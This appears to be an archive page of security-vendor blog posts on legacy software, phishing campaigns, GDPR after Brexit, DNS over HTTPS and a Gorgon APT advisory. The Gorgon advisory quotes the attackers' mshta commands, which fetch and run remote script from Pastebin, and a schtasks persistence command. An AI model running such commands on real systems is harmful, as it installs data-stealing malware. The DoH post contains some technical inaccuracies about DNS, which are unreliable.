Author Archives: Miriam Cihodariu

What Is Legacy Software and a Legacy System in Business + The Risks

If you are leading a business or work within a business, this guide is definitely for you.

You have probably come across the term legacy software or legacy systems but don’t know exactly what they are. Or, even more likely, you are using legacy software or systems without even knowing it.

But there are risks and challenges associated with this (somewhat unavoidable) business practice.

Below I will explain everything there is to know about making the most you can out of legacy software and systems. As I said, it’s highly probable for a business older than a year to be using at least some tools which can be labeled as legacy tier.

First thing’s first, though: let’s start by exploring what is legacy software and what are legacy systems. Typically, any medium to large company nowadays has at least a few legacy elements in its IT environment.

Next, we’ll move along to tips that can help you identify whether your legacy software or legacy system is one of the risky ones or not.

What Is Legacy Software? Definition(s)

To put it in as few words as possible, legacy software is any piece of software that can’t receive continued patching or support from its developer, or can’t meet the compliance standards in use.

The examples of enterprise-level legacy software can be quite different.

Here are just a few cases which can be labeled as legacy software, to get a better idea of what it can encompass:

  • A major platform with no functional replacement (yet), still supported and compatible with other IT assets, but which does not receive security updates anymore;
  • An older piece of software that is still in use and receives support, but its creators are announcing the transition of support to the newer version of the product (such as the case of Python 2 vs Python 3);
  • A piece of software or platform which still gets updates but only for features (not security patches);
  • A piece of software or platform which still gets security updates and support but is no longer compliant with recent standards;
  • A piece of software or platform which gets updates and support but is not compatible with the newer systems and drivers in use (thus stalling the company’s adoption of those);

In some cases, the category of legacy software can include consumer-oriented software products issued by companies that no longer exist.

But, in spite of the discontinued support – and the discontinued official listing of that software (there’s nowhere to officially buy or download it from) – some users continue to procure it out of nostalgia.

Such is the case of Winamp media player, for example. There are entire Reddit forums dedicated to Winamp nostalgia, along with users still sharing custom made Winamp ‘skins’. There is also newly issued software that can emulate Winamp in-browser. So, the power of nostalgia for legacy software can still make the world go ‘round.

What Is a Legacy System in a Computer Industry Context?

A legacy system is a platform or hub or operating system (something which facilitates digital operations but is one level above software) which is outdated.

This state of being outdated can refer to the fact that the system is either lacking the possibility of support, or to its compatibility with other IT system elements, or to its level of compliance, or to the updates it receives.

Myth Busting Legacy Software and Legacy Systems

Here are the most common misconceptions about legacy software and legacy systems.

#1. Legacy software is useless


While legacy software and legacy systems still pose risks (which I’ll dive into below), it doesn’t mean they outlived their usefulness completely.

In many cases, a piece of legacy software or a legacy system is still in use precisely because it is the most comfortable option. Either there is no exact functional replacement yet, or the transition is still too difficult to weather.

Regardless of the exact reason, companies continue to use legacy software precisely because it’s still useful.

Ideally, yes, people should try to move on from legacy software as soon as it’s feasible, but things are always a bit more complicated in practice.

#2. Legacy software is free


The opposite can be true: precisely because legacy software was quite an investment, companies may be reluctant to replace it yet. An investment only makes sense if the cost is recovered over a pre-determined use period.

In many cases, even subscription-based software and systems (which the company is still actively paying for) are in fact legacy ones. The recurrent fee ensures continuous support and perhaps even some feature updates, but the security patches are unsatisfactory, or the software is not compliant.

#3. Legacy software is unsupported

Not always.

As mentioned above and through the examples so far, there are cases when legacy software is still supported by an actual team and you can still get an account manager to troubleshoot stuff for you.

Regardless, no matter how active and involved the support team behind the software is, if it doesn’t get security updates or is uncompliant, it still counts as legacy software.

#4. Legacy software is dangerous

Not always.

I know that most sources you will consult about legacy software will seem to push you to replace it ASAP, on account of it being dangerous.

But the truth is that legacy software is not always dangerous. It depends a great deal on the specifics of the case.

I’ll get into more detail on how to mitigate the risks of legacy software below.

#5. Legacy software and legacy systems should be immediately replaced


Just as legacy software is not always dangerous, so it does not always need to be replaced. It depends on the case and its specifics. Not only of the software but also of the company and its way of operating.

Before you decide whether a particular piece of legacy software needs to get replaced, you should do a case analysis. Applying software updates is a major hassle anyway for company IT admins unless they are already using a smart patching automatization software. No need to make that job even harder.

The Risks of Running Legacy Software and Systems in Your Business

Still, even if legacy software is not always dangerous, there are cases when it can definitely pose some risks.

Here are a few examples of such risks deriving from legacy software or legacy systems:

  • The risk of falling prey to a data breach or cyber-attack more easily;
  • The risk of slowing down the activity due to the performance issues or the need to manually fix issues regularly;
  • The risk of becoming non-compliant;

How to Mitigate the Risk of Legacy Software: 3 Ways

In order to avoid these three main types of risk deriving from legacy software or legacy systems, you just need to be proactive about it. Don’t wait until you are already facing a productivity crisis or, worse yet, a security breach.

The main ways to go about it are these:

#1. Consult with security experts about the legacy software elements in your IT environment

As mentioned above, it’s not always dangerous to stick to your legacy software or legacy system already in use. Sometimes the switch can involve costs that are not justified by the amount of risk you need to absorb. So, in some cases, it makes perfect sense to stick with the legacy software (and that’s exactly what some companies do).

Check with security experts to see what software absolutely poses a risk and what legacy software you can afford to continue using. Also, implement an automatic software patching solution in order to close potential security gaps and to make the life of your sys-admins easier.

#2. Do a case by case comparison between your legacy software and alternatives

Sometimes, the bad news is that legacy software that really needs to be replaced does not have a viable replacement yet.

But when it does, look into it just as you would look into any other business decision, with pros and cons. When you consider the (explicit) costs of updating, also consider the (implicit) costs of not updating. Is a potential breach easier to come back from than absorbing the costs of a change?

#3. Analyze the impediments to a transition from legacy software to non-legacy software

Also, in each case analysis, consider all the other variables and effort required for a transition. Compatibility and cost concerns are valid, but internal effort and time should not weigh so much in the final decision. Just because it will be a bit of a hassle doesn’t mean you should postpone indefinitely. That’s what gets companies on the breach list in most cases.

This concludes today’s guide on legacy software and legacy systems. If you have any questions or stories to share, feel free to comment below or contact me. I’m here to help if I can.

The post What Is Legacy Software and a Legacy System in Business + The Risks appeared first on Heimdal Security Blog.

SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries

People in Nordic countries and beyond should beware: there’s a new credential stealing campaign up and running. For now, it seems to be hitting mostly these countries, but there’s no telling when it will extend to the rest of the world. Where there’s (illicit) money to be made, hackers are restless.

How the New Nordics Credential Stealing Campaign Works

As far as we’ve seen so far, the new Nordics credential-stealing campaign is targeting working emails. The malicious message pretends to be part of a previously agreed upon conversation, since the document is introduced as a link, without much explanation.

This is how a typical email looks like:

Fra: [sender email address] Sendt: 2. oktober 2019 09:56
Emne: Doc
Prioritet: Høj


Finn vedlagte dokument

Vis Dokument ({7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&

Med vennlig hilsen


Phone, Email, Company name etc.]

Translated into English, this email would be this:

From: [sender email address]
Posted: October 2, 2019 9:56 AM
Subject: Doc
Priority: High


Find the attached document

View Document ({7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=tar 7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82% 2FPDF% 20002% 7C4c8df191-241d-4d43-91b6-b3658f3bcdca% 2F% 29)

With best regards


Phone, Email, Company name etc.]

What happened next, if the user clicked that link?

They are redirected to a picture of a document (it’s not even a real document). The picture has a hyperlink inserted on it, which means that when a user clicks it, they will be redirected to a malicious page.

screenshot of fake document

The fraudulent page then asked users to login with whatever account they had, either Yahoo, Office 365, Gmail, etc.

You can watch a slideshow of what happened here (just move your mouse left-right to scroll through the screenshots).

A day later, the Nordics credential stealing campaign grew a new form. This time, the malicious document link was this one, instead:{b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view&

In both cases, the malicious portal behind the fake links was

How to Stay Safe from the New Nordics Credential Stealing Campaign

If you have an active Thor Foresight or Thor Premium subscription you are automatically protected from the malicious links above.

But if you’re not – and even if you are – make sure you’re ready for the next round. This campaign or another one like it will be back.

The best way to deal with them is to stay on your guard:

  • Don’t open documents and don’t click any links in emails from people you don’t know;
  • Be proactive about your cybersecurity and have a DNS traffic filter (like Thor Foresight – either for Home or Enterprise);
  • Stay informed about credential stuffing (why criminals might want to steal your credentials) and about phishing in general;
  • If you are part of managing an organization (which means you and your employees will be huge targets for all sorts of phishing attempts), learn about business email compromise (BEC) and about MailSentry™, a cybersecurity solution specially designed to block BEC attacks of any kind.

Stay safe!

The post SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries appeared first on Heimdal Security Blog.

Scam Alert: Digi Phishing Campaign Detected, Asking Credentials for a Prize

Summary: we discovered a Digi phishing campaign targeted at Romanian internet users. However, the campaign is displaying tailored content for each country, so its actual target pool is much larger. The malicious domains could be accessed from organic Google search results and led the user to a page with Digi branding elements.

Once there, the users were invited to go through some steps, ‘win’ a prize consisting of a new smartphone and then claim the ‘prize’ by submitting their personal details, including credit card information.

How Does the Digi Phishing Campaign Work?

Incidentally, we found these malicious websites while looking for Antivirus-related search words on Google. It’s pretty ironic if I think about it since people who are looking for cybersecurity software could be well enough prepared to recognize a phishing campaign. Of course, I suspect that this is not the only search that could lead to these malicious but organic results to be displayed.

malicious organic search results

The malicious link for the Digi phishing campaign only worked if accessed from Google. If we attempted to access them directly, the browser just entered a redirect loop and nothing was loaded.

Once we accessed the website, the page first asked for verification of humanity (the standard ‘Confirm you are not a robot’ checkbox). Oddly, this first screen was displayed in Spanish, although the next ones are in Romanian, based on the correct identification of our location.

digi phishing campaign pic 1

After moving past the human confirmation screen, a page imitating the Digi brand is displayed. The page offers congratulations for being ‘one of the selected 100 users’ eligible to receive a smartphone gift. But before you can receive your gift, you need to answer 9 questions.

digi phishing campaign pic 2

The questions are well crafted as to not arouse suspicion. All of them were about the devices you use, what other internet and cable providers have you had, that kind of stuff – it can seem like legitimate competitor research questions a brand can ask its users.

After moving through the questions, you get another confirmation that you answered all of them, that no duplicate IP entries were found and that you are indeed about to get the smartphone reward.

digi phishing campaign page 3

Clicking ‘Next’ will take you to a page displaying the smartphone prize and asking for your email, as well as a confirmation you are over 18.

digi phishing campaign pic 4

After entering your email, you are asked for your credit card details, allowing you to ‘buy’ the smartphone for 4.99 RON, the approximate equivalent of 1 EURO. There’s also a countdown timer on the offer to make you feel the FOMO.

Judging by the bad grammar and spelling on this page, I have a strong hunch that this Digi phishing campaign displays in other languages as well, probably across Europe. 

digi phishing campaign pic 5

These are the malicious URLs we identified as part of this Digi phishing campaign (but they do not work if accessed directly, only if accessed through search results):{browser}&p=599&lpkey=15017060014a220f78&source=AdCash&campaign=173949420&zone=2048991-600419873-0&subzone=Adsterra&uclick=2tdv1ne2bl#

Meanwhile, our own cybersecurity software (the DNS traffic filtering engine in Thor Foresight Home) blocks all of the above.

Context: Another Campaign Which Fakes Digi Branding, but on Social Media

As it happens, another fraudulent campaign using the Digi branding has been identified in the past few days, on social media. There were 5 fake Facebook Digi accounts posing as the official page, even if they were clearly recently created and had very few likes. Link to full story HERE (the text is written in Romanian).

Even more weirdly, one of the pages also ran a sponsored campaign on Facebook, attempting to grow its user pool. The incident is unanimously believed to be a part of a potential electoral fraud campaign, preparing to flood people with fake news in order to influence their votes.

This Digi fake accounts campaign is not so different from the Cambridge Analytica scandal and also with some Russian involvement. Some of the ‘o’ characters in these fake Digi pages were not quite right, and a closer look revealed that the input method had been a Russian keyboard, using the Cyrillic equivalent of ‘o’.

Potential of Electoral Fraud?

Such campaigns have a huge potential for electoral fraud and other types of social engineering. While the two types of campaigns discovered could be unconnected, I’m not yet sure it’s all a coincidence.

It’s clear that the objective of the first campaign was to collect credit card details for some type of actual financial theft. It’s also true that Digi is a very well-known brand, so it makes sense for any hacking group to use its image for a campaign.

But at the same time, I am also concerned that the two Digi phishing campaigns are not unrelated and hacking into people’s wallets is just another offshoot of malicious intent. Especially since elections are upcoming and social engineering has already proved its potential for evil, I suspect we will see more in the following months.

How to Stay Safe from Phishing and Social Engineering in General:

We’ve written dedicated guides on how to stay safe from phishing and how to recognize social engineering. Please feel free to browse them and take some precautions from there.

In a nutshell, the most important take-away from the Digi phishing campaign is this: never fail to verify whether a domain you are accessing is the real deal. You can do this by checking its name in the address bar, by closing the tab and going to the official website, or even by contacting the customer service to be found on the official page. If an offer sounds too good to be true, it probably is.

As for social engineering and the potential of election fraud, things can be more complicated. There was huge backlash in both ways after the Cambridge Analytica scandal came to life. People are not comfortable accepting that they can be manipulated easily and that perhaps their ideas are not exactly their own. The only advice for this, beyond checking whether the pages posting stuff on social media are the official ones, is to strengthen your critical thinking as much as possible.

Note: I would like to thank my colleague Eduard Roth who initially drew my attention to this Digi phishing scam.

The post Scam Alert: Digi Phishing Campaign Detected, Asking Credentials for a Prize appeared first on Heimdal Security Blog.

GDPR after Brexit: No Deal and All Other Exit Scenarios Explained

As the British MPs and the EU representatives continue to discuss the specifics of the upcoming Brexit, nothing is yet settled. In this murky context, companies in the UK and companies working with companies in UK are rightly confused.

What about GDPR, the transnational European data protection regulation to which we were just beginning to adjust?

Will there still be a GDPR after Brexit, for the UK space?

If it will change, how so?

Should a new kind of data protection compliance regulation be created for the UK instead of GDPR?

All these topics are intensely debated right now across all business mediums. Unfortunately, there’s a lot of uncertainty and a lot of Brexit and GDPR myths as well.

Let’s walk through everything together and see what will really happen with GDPR after Brexit on all possible scenarios.

Possible Brexit Scenarios

For now, British politicians are still stuck on debating whether they want to comply to the new law against a no deal situation.

There are several possible outcomes, depending on what will be decided on these counts:

  • If they choose to comply with the new law (accept the deal) or not;
  • If they ask for a delay in deciding (Brexit and the deal-or-no-deal debate simply get postponed);
  • If they try to negotiate a new deal;

Regardless of what happens next, the UK and companies connected to this space will still need to deal with GDPR. The GDPR after Brexit issue is not going anywhere.

Even in the most extreme outcomes, data compliance will still be on the agenda. Let’s take a few examples.

A. GDPR after Brexit with a deal

Within the deal currently on the table, GDPR is also stipulated as a must. If the British MPs somehow agree on the deal before the 31st of October deadline, then Brexit goes through as planned. GDPR would be part of the deal with the EU, so the current data compliance regulations stay in place.

In this case, you have nothing to change: GDPR rules stay in place as they are.

B. GDPR if Brexit is delayed and renegotiated

If the British MPs ask for a deadline extension to be able to hopefully gain consensus until then, GDPR essentially remains in place. Until the new deal is discussed and agreed upon, the UK does not technically leave the EU.

That means all European laws and UK-EU agreements stay the same as they were, including the GDPR, at least for the deadline extension.

The political party who initiated Brexit and continues to support it hard says delaying is not an option. But considering that the Parliament can’t seem to reach a consensus on how and when to exit the EU, or even on the idea of exiting at all, a delay is very possible.

C. GDPR after Brexit with no deal (Hard Brexit)

If, let’s say, the UK representatives refuse to comply and accept the deal, this will probably open up a whole can of worms of legal contention.

Until the issues are hashed and rehashed through courts, GDPR will become a big question mark.

One way or another, as the British minister in charge of data protection, Baroness Neville-Rolfe, has recently said, even if GDPR will no longer apply in the UK, some very similar legislation will need to be instated.

“One thing we can say with reasonable confidence is that if any country wishes to share data with EU member states, or for it to handle EU citizens’ data, they will need to be assessed as providing an adequate level of data protection,” Neville-Rolfe said. “This will be a major consideration in the UK’s negotiations going forward.”

While it’s not clear if the UK will still adhere to GDPR after Brexit, or adhere to a similar framework (such as the Privacy Shield, see below), or submit to being independently evaluated,

Useful Info for a GDPR after a No-Deal Brexit:

  • The documents and criteria for the EU’s adequacy decisions (how they decide a country provides adequate data protection and is therefore trustworthy);
  • The Privacy Shield Framework: a framework which allows people to transfer their personal data from the EU to the US while maintaining GDPR standards. There is the possibility for the UK to adhere to it or create a similar framework;
  • The Official GDPR FAQs – on the main GDPR portal.

There are 5 possible scenarios for a GDPR after Brexit with no deal, depending on your role in the data ecosystem.

We’ll tackle each one, but rest assured that the matter of data protection will not return to its pre-GDPR state. Once the world started taking data protection and privacy concerns seriously (and rightly so), there’s no turning back.

Here are the 5 possible scenarios for GDPR after Brexit with no deal:

In all data exchanges, we can speak of data controllers and data processors.

Data controllers are the business entities which collect the data of their clients and contacts (often in order to provide them with services) AND decide the purposes for which that data will be processed.

Data processors are the business entities which process the data on behalf of a data controller (besides any employees of the controller).

Data subjects are the people whose personal data is being processed.

We’ve drawn the 5 possible scenarios for a GDPR after Brexit, depending on the role of the business in the data flow.

  • Scenario 1: Controllers in the UK, providing services for UK people and entities and sharing no personal data with organizations outside the UK;
  • Scenario 2: Controllers in the UK, providing services for the UK but involved with processors in the EU (or anywhere else outside the UK);
  • Scenario 3: Controllers in the UK, providing services for people and business entities in the EU;
  • Scenario 4: Processors in the UK, acting on behalf of controllers or processors in the EU (or UK and EU);
  • Scenario 5: Processors in the UK, acting on behalf of controllers or processors in the UK.

#1. Scenario 1

This scenario is rather simple. Even though there are not a lot of cases like this in real life, since data circulation is never as tightly sealed as this, it has to be covered by any guide.

If you’re among the rare few UK controllers who only provide services to the UK and has no exchanges with non-UK processors, you’re lucky. You don’t really need to concern yourself with GDPR after Brexit.

The data protection laws you will need to abide by after Brexit are going to be more or less the same as the ones you are used to and will be communicated by UK authorities in due time.

It’s highly possible that after the UK leaves EU with no deal, the controllers doing business solely in the UK will need to comply with the Data Protection Act 2018 (DPA2018) instead of the GDPR. Or, another likely possibility is that GDPR will be absorbed into UK’s own laws upon Brexit (even with no deal).

In any case, the controllers defined by scenario 1 are the least affected by the GDPR after Brexit issue, because nothing will actually change for them.

#2. Scenario 2

Most small UK businesses fall into this category, of controllers in the UK who are involved with processors outside EU. Basically, anyone who uses international software like Microsoft, Facebook, Dropbox, and so on, can be fitted into this second scenario.

Legally, nothing really changes in this case either, because GDPR after Brexit will mean adopting the UK data protection law, DPA2018 (linked above). Since the processors outside the UK will still be compliant with GDPR, there is nothing that hinders these UK controllers from continuing to use their services.

#3. Scenario 3

In scenario 3, the UK controllers are not just working with non-UK processors but they are even serving EU-based clients or having EU offices and so on. In this case, the situation is a bit murkier.

The problem is that communicating between various branches and entities involved in the business process might be stalled by GDPR after Brexit.

To be proactive about it, you can designate a DPO (Data Protection Officer) in each country you have offices in, and that should cover the conditions imposed by the EU on third countries (which the UK will effectively become).

This will solve compliance issues, but be warned that handling GDPR after Brexit in paperwork terms might not be the worst of it. Because of the extra hassle involved, it’s very likely that obtaining more clients in the EU market will be difficult. It will be harder to compete with EU controllers who don’t have post-Brexit ambiguity to sort through.

#4. Scenario 4

After May 2018, all processors in the UK who were working with EU organizations were required to have them sign contracts which stipulated how their data would be handled. The issue here is that those contracts and agreements mentioned the UK as an EU country, which will no longer be true.

This means that all this paperwork will need to be redone. It’s best if you are proactive and start sending out the revised forms as soon as the Brexit decision is concluded one way or another.

There is the risk that some of your business partners will decline to resign, but you do the best with what you have and move on. Continuing to do business with them in the absence of flawless paperwork is too great of a risk to take.

#5. Scenario 5

For processors in the UK working only with data of people within the UK (and for controllers in the UK), the same applies as in Scenario 1. In other words, nothing changes, there is no extra concern to be had.

Cybersecurity Risks of GDPR after Brexit: A Few Words of Caution

As you can see by now, GDPR after Brexit will bring a lot of paperwork in many cases. Not just paperwork, but also a lot of communications going on with partners across national frontiers.

Since these communications will not be your standard run-of-the-mill, since the Brexit situation is new to everyone, this can be a huge opportunity for cybercriminals.

Be wary of any email you receive about Brexit and GDPR matters, especially if the sender is prompting you to do something involving vulnerable data. Don’t enter your login details on any page (could be a phishing attempt), don’t engage in conversations with people you don’t really know from before, etc.

Business Email Compromise (BEC) is a growing and costly threat. The little chaos which will likely flood everyone’s emails concerning GDPR after Brexit is the perfect opportunity for BEC attacks.

Spam filters are not enough to tackle it – you need to do some thorough background checks with every email and to also have an email security solution specially designed to counter BEC attacks.

Wrapping it up

I hope this guide helped clear the confusion surrounding GDPR after Brexit. In any case and however convoluted the Brexit process will continue to be, you should take some steps to prepare for the future.

Just look up your own business situation in the scenarios above and find out what can you expect even if we’ll have a no-deal Brexit. Good luck and drop us a line with any concern you might have.

The post GDPR after Brexit: No Deal and All Other Exit Scenarios Explained appeared first on Heimdal Security Blog.

SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign

The Gorgon APT (Advanced Persistent Threat) is an older but dangerous online threat, first discovered by Unit 42 researchers in February 2018.

The group behind the Gorgon APT was revealed back when the researchers were still investigating Subaat, an attacker, when they realized that they were probably part of a larger group targeting governmental organizations.

The History of Attacks by Gorgon APT

Ever since its initial discovery in February 2018, the Gorgon APT was orchestrating attacks both on government organizations (in the United States, United Kingdom, Russia, Spain, and others) and on corporate targets around the world.

The Gorgon group has often shared infrastructure when performing criminal and nation-state targeted attacks. This made the APT easier to track across these operations.

Within the Gorgon APT infrastructure, the researchers were able to identify several crimeware family samples, including Trojans, RATs like NjRat and info stealers such as LokiBot. These were all hosted on the command and control (C2) domain of the Gorgon group.

Interestingly, the Gorgon APT didn’t just use the traditional C2 strategies we could expect from it. It also used a variety of URL shortening services in order to download its payloads. This made its criminal activity more wide-spread and potentially more complex to track down, identify and eradicate.

The Current Spear Phishing Campaign by Gorgon APT

While the activities of the Gorgon APT flared on and off from February 2018 until now, the group is now back strongly with a new spear-phishing campaign.

So far, the targets we have intelligence about are located in Europe, but everyone else should be on guard too. It begins with an email containing this text (sanitized for your safety):


Re: Invoice_74521451


Dear Sir

My colleague handling this order is out of office for his vacation.

Please confirm the attached invoice as enabling us to proceed with the payment schedule.


Sri Astuti



As you can see, the bait here is the attached Excel document. Once the target clicks it, the malicious file will deliver the payload. The XLS file contains macro / VBA code which gets enabled once the document is opened.

Just like in its previous attacks, the Gorgon APT then connects to Pastebin and downloads and runs an obfuscated Javascript / VBA code from there.

This is done by spawning a shell with the following command:

mshta http://bit[.]ly/mydahsgkjshwodakiterikus


C:\Windows\System32\mshta.exe” http://www.pastebin[.]com/raw/0php6n7G

This leads to several layers of unescape obfuscation that redirects the traffic to a number of other Pastebin addresses (sanitized for your safety):




It creates a scheduled task that ensures that the payload is continuously downloaded (sanitized for your safety):

C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 300 /tn “DEFENDER Backup” /tr “mshta http:\\pastebin[.]com\raw\3qUvqbpZ”

A total of three script obfuscation methods are used: “StrReverse”, “split variables” and “multiple Wscript objects”.

The payload uses the function “LoadWithPartialName” via “reflection assembly” in the NET framework in order to download and process raw data in memory.

The final payload is a data stealer that communicates with multiple domains, all of which have already been blocked in Heimdal’s Thor Foresight engine.

The malicious XLS document is detected by 8 out of 57 Antivirus products listed by VirusTotal. This means that you can’t rely solely on your Antivirus to stay safe.

How to Stay Safe from the Gorgon APT and other Spear Phishing Campaigns:

#1. Don’t trust emails from people you don’t know

As much as possible, do not open attachments or click links from emails coming from unknown contacts. I know that in a professional environment this is virtually impossible but try to do your best.

You can read the emails, but don’t click links or open attachments until you establish more contact background. Reach out and ask the sender to remind you where you were acquainted or what deal they are bringing up.

Ideally, find a way to verify the sender legitimacy independent of further email threads. Pick up the phone and give them a call. Ask who introduced you if they are legit and how well do they know them.

#2. Don’t enter your credentials anywhere without extra checks

If you find yourself on a website or portal that looks like one you trust (Google, Facebook, Outlook, Salesforce, etc.) but which asks you to re-enter your credentials, don’t do it. No matter how much it looks like the real deal, it could be a spear-phishing attempt.

Make sure you check and double-check that the website address is correct, with no alterations. If you have any doubts, don’t enter your credentials. If it’s indeed necessary, you will be prompted to do it in the mail portal / app that you use, anyway.

#3. Have an email security solution firmly in place

Run your incoming emails through a solution which prevents BEC attacks, to make sure online crooks are not trying to fool you. Business Email Compromise (BEC) attacks are a growing threat and your email spam filter or firewall are not enough to halt it.

Final word

Last, but not least, stay vigilant. Learn how social engineering works, and how cybercriminals can get into your accounts. Keep learning more about cybersecurity so nothing can catch you by surprise.

If you’re interested, sign up for our Cybersecurity Course for Beginners. It’s completely free and you can learn everything at your own pace. Stay safe!

The post SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign appeared first on Heimdal Security Blog.

Enabling DNS over HTTPS (DoH): Advantages and Best Practices

A new internet protocol is making headlines in the world of enterprise security: DNS over HTTPS. Even though this is of major interest especially for businesses and organizations, regular users will be impacted by it as well. Are you ready for this cybersecurity revolution yourself?

Here’s what all the fuss is about the new DoH protocol. If done right, the hype around it is well-deserved. Once it’s implemented well, DoH can make network communications much more secure.

The new DNS over HTTPS protocol is still relatively new in the world of network connections. First emerged about two years ago, the new protocol is mostly not implemented yet.

When it comes to browsers, Google seems to be the first to it. They recently announced they plan to roll out DNS over HTTPS in the near future.

This guide will tell you what this means and how you can implement DNS over HTTPS yourself, the changes to expect and so on.

What Is DNS over HTTPS (DoH) and How Does This Protocol Work?

First thing’s first, let’s clear up the basics. Not everyone understands exactly what DNS is and how it works, let alone the new DNS over HTTPS.

DNS definition:

DNS stands for Domain Name Server and it helps computer networks attach various information to each web domain. To put it simply, all Domain Name Servers are basically the fundamental internet address book.

But while people can remember a domain name easily, computers need numbers to understand it. That’s why the DNS system ‘translates’ each domain name into an IP number and assigns this info, together with other details.

A DNS traffic filtering solution is a crucial security layer for businesses and consumers alike. We discussed elsewhere the importance of DNS traffic filtering and what cybercriminals can hope to get from infiltrating it.

Now that we defined DNS and DNS filtering, let’s move on to the new buzzword in cybersecurity news: DNS over HTTPS (DoH).

DNS over HTTPS (DoH) definition:

The new standard released by the IETF enables DNS protocol to be enabled over HTTPS connections (the more secure form of HTTP).

DNS over HTTPS (abbreviated as DoH) is an internet security protocol which communicates domain name server information in an encrypted way over HTTPS connections.

DNS over HTTPS vs. DNS over HTTP vs. DNS over TLS

A. DNS over HTTP vs DNS over HTTPS

Most networks are now still using DNS over HTTP communications, which makes them vulnerable to man-in-the-middle attacks if they are not protected by a traffic filtering solution. This is because this communication is sent in plain text.

The innovation brought on by the DNS over HTTPS protocol is that the communication is encrypted using built-in application HTTPS standards. This helps achieve an unprecedented default level of privacy and data protection since the encryption is (or should be) the golden standard.

Man-in-the-middle attacks (a common cybersecurity concern) are more or less useless if DNS over HTTPS is enabled. Since all DNS requests are encrypted, a 3rd party observer cannot make sense of the data they would gleam.

If that data is not encrypted (such as in the DNS over HTTP protocol), it is easy for a 3rd party malicious observer to see what domains you are trying to access. In contrast, when DoH is active, this data is encrypted and hidden within the enormous amount of HTTPS data which passes through the network.

Therefore, there is no comparison to be drawn between DNS over HTTPS (DoH) and DNS over HTTP. DoH is clearly the superior protocol. It’s only a matter of time until everyone adopts it one way or another, and the road may indeed be difficult for a time.

B. DNS over HTTPS vs. DNS over TLS

I think we’ve cleared up by now what is DNS over HTTPS (DoH).

DNS over TLS (or DoT) is regarded by some as being more or less the same thing with DoH, but this is not accurate. It’s true that both types of protocols achieve the same result: encrypting your DNS communications.

But each type of DNS protocol uses a different port for this encryption they make and the focus of each. The DoH encryption allows, theoretically, network admins to view the encrypted DNS traffic should an issue arise, while the DoT encryption can protect data even from admins.

The fans of DoT protocols state that this DNS over TLS standard is a better fit for human rights concerns in problematic countries. At the same time, in countries where freedom of speech may be limited, the only effect of enabling DoT encryption may be that it draws attention. In other words, authoritarian regimes may look unfavorably upon those who adopt DoT instead of the more mainstream DoH.

Other than that, there is also the technical difference of the port used. DNS over TLS has its own dedicated TLS port, Port 853. DNS over HTTPS uses a different one, Port 443. This internet port (Port 443) is the current standard for all HTTPS communications, so it makes sense that DoH uses it too.

How Chrome and Mozilla Are Going to Implement DNS over HTTPS (DoH)

Both Google Chrome and Mozilla have announced that they plan to include DNS over HTTPS by default in future builds.

A. How Chrome will include DNS over HTTPS:

For now, the Chrome team is experimenting with the new DoH protocol only for a limited number of users. This trial period will help them fix any potential issues and figure out how to then deploy DoH for everyone.

The DNS over HTTPS protocol will be tested starting with the new Chrome 78 version of the browser, which is not launched yet. You can also opt into this experiment if you’d like to be part of the users who get DoH in advance.

You can access the Chrome flag chrome://flags/#dns-over-http in order to activate or deactivate the DNS over HTTPS experiment, once Chrome 78 is live.

The only downside to this is that DoH is still relatively hard to configure manually in Chrome, for inexperienced users at least.

B. How Mozilla will include DNS over HTTPS:

To their credit, Mozilla has been working on DNS over HTTPS implementation for a longer time than Chrome, and it shows. As of now, opting to implement DoH in your browser is easy even for non-technical users, and the protocol settings have a much more developed interface.

For now, it’s an opt-in, as mentioned above, but Mozilla has announced that they plan to make DoH a default in future browser versions as well.

How DNS Traffic Filtering Solutions Need to Adapt to HTTPS

As most organizations are already aware, a DNS traffic filtering solution is a crucial layer of their cybersecurity environment. But while most organizations are already using a DNS traffic filter, the dilemma brought on by DoH is that compatibility issues may arise once browsers start using DoH by default.

In laymen’s terms, here’s what can be problematic. DNS traffic filtering solutions are using the settings built-in Operating Systems in order to perform DNS queries. But if the browser (whether it be Chrome or Mozilla) will no longer use the standard DNS port (53) for queries and instead switch to the DoH one (443), the traffic filtering solution will lose sight of those queries.

Basically, this has an upside and a downside. On the upside, the built-in DNS over HTTPS protocol from browsers will take over some parts of the functionality held until now by DNS traffic filtering solutions. This is good news for those who did not yet adopt a DNS traffic filter, but they should still be warned that DoH is not enough for security.

On the downside, when the DNS queries from the browser are wrong (or intentionally misled by malicious 3rd parties), the DNS traffic filter might have trouble catching on.

This is why when choosing a DNS traffic filter provider, you need to make sure that they support DNS over HTTPS correctly. Our Thor Foresight Enterprise solution is currently developing a solid integration of DoH.

How to Implement DNS over HTTPS Correctly in Your Organization

Since for the first time the DNS over HTTPS protocol makes the DNS traffic communications encrypted, this can bring about more privacy and better security for users and organizations.

But because the DoH protocol is still new, some organizations are anxious about adopting it, due to compatibility and implementation issues. Here’s what you need to know in order to ensure a smooth transition to DNS over HTTPS.

Pros to Early Adoption of DNS over HTTPS (DoH):

  • You get to test out how DoH will integrate with your networks ahead of time and fix any potential issues before the DoH protocol becomes default;
  • If implemented right, you can gain more data security and better privacy across your organization;
  • You get to test out the compatibility of DNS over HTTPS with your DNS traffic filter;
  • Your feedback may help all software parties involved better their products, to your benefit.

Cons to Early Adoption of DNS over HTTPS:

  • If your system admin(s) are not experienced with DoH and similar security protocols, this can end up in blocked queries, false-positive security flags and so on;
  • If your DNS traffic filtering solution has not worked to integrate with DoH, this can render it ineffective;

How We Cover DoH within Thor Foresight Enterprise

For the moment, our Thor Foresight Enterprise product (which includes DarkLayer Guard, a market-leading DNS traffic filtering solution) circumvents the DNS over HTTPS which will be implemented by browsers.

While we still use the DNS settings from the operating system, we supplement the queries from the browser. Since the DoH protocol is still under tests in browsers, whenever DNS servers will have a fallback, their system will proceed to query the OS settings, which is where our solution comes in.

On the long(er) run, we are working to fully integrate the DoH protocol with DarkLayer Guard in a way which will help every party involved develop stronger cybersecurity and cyber resilience.

Wrapping up

